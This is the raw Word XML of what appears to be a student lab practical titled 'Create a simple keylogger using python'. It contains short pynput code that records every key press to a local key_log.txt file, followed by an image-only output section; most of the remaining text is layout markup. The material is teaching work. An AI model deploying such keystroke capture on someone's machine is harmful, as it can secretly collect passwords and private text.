        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1666875" cy="12287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1" w:rsidRPr="00D4195F" w:rsidRDefault="00363221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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PRAC</w:t>
      </w:r>
      <w:r w:rsidR="0022739E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TICAL NO. 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3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Aim: -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a simple </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3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Code: -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr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from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pynput.keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import Key, Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr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import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no name it gets into an empty string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ""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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a basic logging function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.basicConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>filename=(log_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+"key_log.txt"), level=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.DEBUG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, format='%(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)s:%(message)s:')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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is from the library</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(key):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ab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.info(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(key))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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> says, listener is on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Listener(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Output: -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="004F0EC2" w:rsidP="002E6941">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0021C78B" wp14:editId="7125AB4C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5D3" w:rsidRPr="00D4195F" w:rsidSect="00E60381">
      <w:footerReference w:type="default" r:id="rId78"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="620" w:right="1040" w:bottom="1440" w:left="1220" w:header="0" w:footer="881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F0" w:rsidRDefault="000527F0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000527F0" w:rsidRDefault="0005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9C" w:rsidRDefault="00DD0B9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9258300</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3337560" cy="327660"/>
              <wp:effectExtent l="0" t="0" r="15240" b="15240"/>
              <wp:wrapNone/>
              <wp:docPr id="962" name="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3756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19C" w:rsidRDefault="00E5519C" w:rsidP="00780195">
                          <w:pPr>
                            <w:pStyle w:val="BodyText"/>
                            <w:spacing w:line="264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46" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:70.8pt;margin-top:729pt;width:262.8pt;height:25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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C" w:rsidP="00780195">
                    <w:pPr>
                      <w:pStyle w:val="BodyText"/>
                      <w:spacing w:line="264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5489575</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9254490</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1444625" cy="177800"/>
              <wp:effectExtent l="0" t="0" r="3175" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="961" name="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46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19C" w:rsidRDefault="00E5519C" w:rsidP="0015039B">
                          <w:pPr>
                            <w:pStyle w:val="BodyText"/>
                            <w:spacing w:line="264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 45" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:432.25pt;margin-top:728.7pt;width:113.75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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C" w:rsidP="0015039B">
                    <w:pPr>
                      <w:pStyle w:val="BodyText"/>
                      <w:spacing w:line="264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9C" w:rsidRDefault="00DD0B9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201616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>902335</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="bottomMargin">
                <wp:align>top</wp:align>
              </wp:positionV>
              <wp:extent cx="2339340" cy="273050"/>
              <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="14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934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19C" w:rsidRDefault="00E5519C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6" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:184.2pt;height:21.5pt;z-index:-11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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C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202640" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5518150</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9359265</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1444625" cy="177800"/>
              <wp:effectExtent l="0" t="0" r="3175" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="18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46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19C" w:rsidRDefault="00E5519C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 5" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:736.95pt;width:113.75pt;height:14pt;z-index:-11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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C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9C" w:rsidRDefault="00E5519C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9C" w:rsidRDefault="00DD0B93">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="9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194040" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>902335</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="bottomMargin">
                <wp:align>top</wp:align>
              </wp:positionV>
              <wp:extent cx="2315845" cy="213995"/>
              <wp:effectExtent l="0" t="0" r="8255" b="14605"/>
              <wp:wrapNone/>
              <wp:docPr id="938" name="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584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19C" w:rsidRDefault="00E5519C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2" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:182.35pt;height:16.85pt;z-index:-12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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C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194064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5518150</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9254490</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1444625" cy="177800"/>
              <wp:effectExtent l="0" t="0" r="3175" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="937" name="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46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19C" w:rsidRDefault="00E5519C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 21" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:728.7pt;width:113.75pt;height:14pt;z-index:-12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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C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9C" w:rsidRDefault="00DD0B93">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="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194088" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>902335</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="bottomMargin">
                <wp:align>top</wp:align>
              </wp:positionV>
              <wp:extent cx="2351405" cy="225425"/>
              <wp:effectExtent l="0" t="0" r="10795" b="3175"/>
              <wp:wrapNone/>
              <wp:docPr id="936" name="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5140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19C" w:rsidRDefault="00E5519C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0" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:185.15pt;height:17.75pt;z-index:-12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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C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194112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9454515</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1444625" cy="177800"/>
              <wp:effectExtent l="0" t="0" r="3175" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="935" name="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46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19C" w:rsidRDefault="00E5519C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 19" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:421pt;margin-top:744.45pt;width:113.75pt;height:14pt;z-index:-1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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C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9C" w:rsidRDefault="00DD0B9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194424" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>902335</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="bottomMargin">
                <wp:align>top</wp:align>
              </wp:positionV>
              <wp:extent cx="2339340" cy="273050"/>
              <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="922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934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19C" w:rsidRPr="00D569E9" w:rsidRDefault="00E5519C" w:rsidP="00D569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1.05pt;margin-top:0;width:184.2pt;height:21.5pt;z-index:-12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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRPr="00D569E9" w:rsidRDefault="00E5519C" w:rsidP="00D569E9"/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194448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5518150</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9359265</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1444625" cy="177800"/>
              <wp:effectExtent l="0" t="0" r="3175" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="921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46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19C" w:rsidRDefault="00E5519C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7" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:736.95pt;width:113.75pt;height:14pt;z-index:-12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" filled="f" stroked="f">
              <v:path arrowok="t"/>
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C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F0" w:rsidRDefault="000527F0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000527F0" w:rsidRDefault="0005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569"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BD03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6F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="961AD5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051A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC6C9C46"/>
    <w:lvl w:ilvl="0" w:tplc="3E5840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C5105"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7682C28C"/>
    <w:lvl w:ilvl="0" w:tplc="0AE0B564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1" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2381" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3101" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3821" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4541" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5261" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5981" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40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">
    <w:nsid w:val="11226B79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7502448E"/>
    <w:lvl w:ilvl="0" w:tplc="E8C6B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0D2A6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7682C28C"/>
    <w:lvl w:ilvl="0" w:tplc="0AE0B564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1" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2381" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3101" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3821" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4541" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5261" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5981" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40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6">
    <w:nsid w:val="23743F7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B55AD83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A4139"/>
